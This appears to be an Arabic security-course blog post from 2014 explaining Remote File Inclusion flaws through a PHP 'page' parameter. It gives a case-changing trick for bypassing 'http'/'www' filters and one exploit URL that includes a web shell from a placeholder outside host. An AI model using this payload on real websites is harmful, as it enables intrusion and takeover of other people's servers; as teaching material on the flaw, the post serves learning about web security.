الأربعاء، 9 يوليو، 2014

دورة الامن المعلوماتي الدرس الثالث عاشر ثغرات RFI-الجزء الثاني


تعرفنا في درسنا السابق عن ثغرات تضمين الملفات عن بعد،و كنت قد ذكرت بأن هذا النوع من الثغرات على طريق الإنقراض إﻻ أن العديد من المواقع العربية ﻻ تزال تعاني منها بسبب ضعف مستوى البرمجة لدى المطورين العرب،فقليلون جدا من يستخدمون البرمجة الكائنية و عدد أقل يستخدم أطر العمل الشهيرة.

يتم استغلال ثغرة تضمين الملفات عن بعد في العادة عن طريق التلاعب بالطلبات التي يصدرها الموقع نفسه،كيف ذلك؟ ببساطة نحن نعلم أننا عندما نقوم بطلب صفحة معينة في الموقع فإننا نصدر أمر GET للموقع من أجل أن يعطينا الصفحة المعنية،كمثال على ذلك
www.site.com/index.php?page=index
مثلا الرابط السابق سيقوم بتوجيهنا إلى الصفحة الرئيسية للموقع...سنقوم نحن الآن بالتلاعب بالرابط و نرى ما سيحدث...
www.site.com/index.php?page=samir


في معظم اﻷحيان يقوم السيرفر بالرد علينا إما بصفحة بيضاء و هذا نتيجة لتفعيل خاصية عدم إظهار الأخطاء،و إما برسالة خطأ في حالة عدم تفعيل تلك الخاصية أو بتحويل redirect إلى رابط آخر...و هنا مكمن الثغرة.
في بعض الأحيان يقوم المبرمج بالتحقق إن كان الرابط يحوي إحدى البروتوكوﻻت المعروفة مثل http أو www أو غيرهما و ذلك ظنا منهم بأنه بالتحقق من وجودها سيقومون بحماية موقعهم من ثغرة تضمين الملفات،هنا يمكننا التلاعب بالرابط أيضا أثناء عملية الإستغلال عن طريق تغيير www إلى WwW مثلا أو أي شكل آخر المهم لن تكون على شكلها الإفتراضي...

الإستغلال:
تعتبر ثغرة تضمين الملفات من أسهل الثغرات استغلال،فيكفي أن تقوم بإضافة مسار الملف الذي يحوي الكود الخبيث و ليكن ملف شل مثلا إلى رابط الموقع الذي يحوي الثغرة على الشكل التالي:
www.site.com/index.php?page=HtTP://wWw.xxxxxxxxxx.com/Shell.TXT 
عليك تغيير ما بعد page بمسار الملف الذي قمت برفعه حتى تستطيع التضمين.
تلاحظون تماما بأن هذا الدرس و الدرس السابق كانا بشكل نظري بحت و هذا بسبب أن هته الثغرة لم تعد تجدي نفعا مع المواقع الأجنبية،عكس المواقع العربية التي ﻻ زال مطورها يستخدمون أسلوب البرمجة التقليدية

0 التعليقات:

إرسال تعليق

لا تنسى ان تشارك samir soltani بتعليقك
او نشر الموظوع جزاك الله خيرا